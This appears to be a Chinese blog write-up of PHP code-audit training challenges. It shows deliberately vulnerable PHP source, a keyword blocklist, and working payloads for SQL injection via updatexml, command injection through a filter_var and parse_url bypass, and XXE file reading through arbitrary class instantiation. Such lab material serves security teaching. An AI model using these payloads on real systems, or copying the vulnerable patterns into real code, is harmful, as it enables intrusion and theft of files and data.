文章目录

Day1 in_array函数缺陷

解题

payload

Day2 - filter_var函数缺陷

解题

payload

Day3 实例化任意对象漏洞

解题

payload1

来自先知社区-红日安全-

Day1 in_array函数缺陷

链接

//1.php
<?php
include 'config.php';
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
    die("连接失败: ");
}

$sql = "SELECT COUNT(*) FROM users";
$whitelist = array();
$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    $whitelist = range(1, $row['COUNT(*)']);
}

$id = stop_hack($_GET['id']);
$sql = "SELECT * FROM users WHERE id=$id";

if (!in_array($id, $whitelist)) {
    die("id $id is not in whitelist.");
}

$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    echo "<center><table border='1'>";
    foreach ($row as $key => $value) {
        echo "<tr><td><center>$key</center></td><br>";
        echo "<td><center>$value</center></td></tr><br>";
    }
    echo "</table></center>";
}
else{
    die($conn->error);
}

?>

//config.php
<?php  
$servername = "localhost";
$username = "fire";
$password = "fire";
$dbname = "day1";

function stop_hack($value){
    $pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval";
    $back_list = explode("|",$pattern);
    foreach($back_list as $hack){
        if(preg_match("/$hack/i", $value))
            die("$hack detected!");
    }
    return $value;
}
?>

解题

in_arry的绕过,没有使用强匹配,所以可以绕过
stop_hack()过滤了常见的字符串拼接函数,一样可以用updatexml注入

payload

?id=4 and (select updatexml(1,make_set(3,'~',(select flag from flag)),1))

Day2 - filter_var函数缺陷

<?php 
$url = $_GET['url'];
if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){
    $site_info = parse_url($url);
    if(preg_match('/sec-redclub.com$/',$site_info['host'])){
        exec('curl "'.$site_info['host'].'"', $result);
        echo "<center><h1>You have curl {$site_info['host']} successfully!</h1></center>
              <center><textarea rows='20' cols='90'>";
        echo implode(' ', $result);
    }
    else{
        die("<center><h1>Error: Host not allowed</h1></center>");
    }

}
else{
    echo "<center><h1>Just curl sec-redclub.com!</h1></center><br>
          <center><h3>For example:?url=http://sec-redclub.com</h3></center>";
}

?>

解题

filter_var 和 FILTER_VALIDATE_URL进行绕过，如：

?url=demo://demo.com:80;sec-redclub.com:80/
?url=http://demo.com%23sec-redclub.com

parese-url()绕过并且满足 $site_info[‘host’] 的值以 sec-redclub.com 结尾

payload

?url=demo://%22;ls;%22sec-redclub.com:80/

%22,为",闭合源代码中的”.系统SHELL执行的就是

curl"";ls;"sec-redclub.com"

?url=demo://%22;cat<flag.php;%22sec-redclub.com:80/

cat flag.php,有空格绕不过filter_var(),所以用cat<flag.php

Day3 实例化任意对象漏洞

<?php
class NotFound{
    function __construct()
    {
        die('404');
    }
}
spl_autoload_register(
    function ($class){
        new NotFound();
    }
);
$classname = isset($_GET['name']) ? $_GET['name'] : null;
$param = isset($_GET['param']) ? $_GET['param'] : null;
$param2 = isset($_GET['param2']) ? $_GET['param2'] : null;
if(class_exists($classname)){
    $newclass = new $classname($param,$param2);
    var_dump($newclass);
    foreach ($newclass as $key=>$value)
        echo $key.'=>'.$value.'<br>';
}

解题

直接利用PHP的内置类,用GlobIterator类搜索文件
GlobIterator

public GlobIterator::__construct ( string $pattern [, int $flags = FilesystemIterator::KEY_AS_PATHNAME | FilesystemIterator::CURRENT_AS_FILEINFO ] )

第一个参数为要搜索文件名

?name=GlobIterator¶m=./*.php

payload1

SimpleXMLElement来读取文件内容

?name=SimpleXMLElement
¶m=<?xml version="1.0"?><!DOCTYPE ANY 
[<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/day/flag.php">]>
<x>%26xxe;</x>¶m2=2

PHP代码审计Day1-4练习题

文章目录

Day1 in_array函数缺陷

解题

payload

Day2 - filter_var函数缺陷

解题

payload

Day3 实例化任意对象漏洞

解题

payload1

猜你喜欢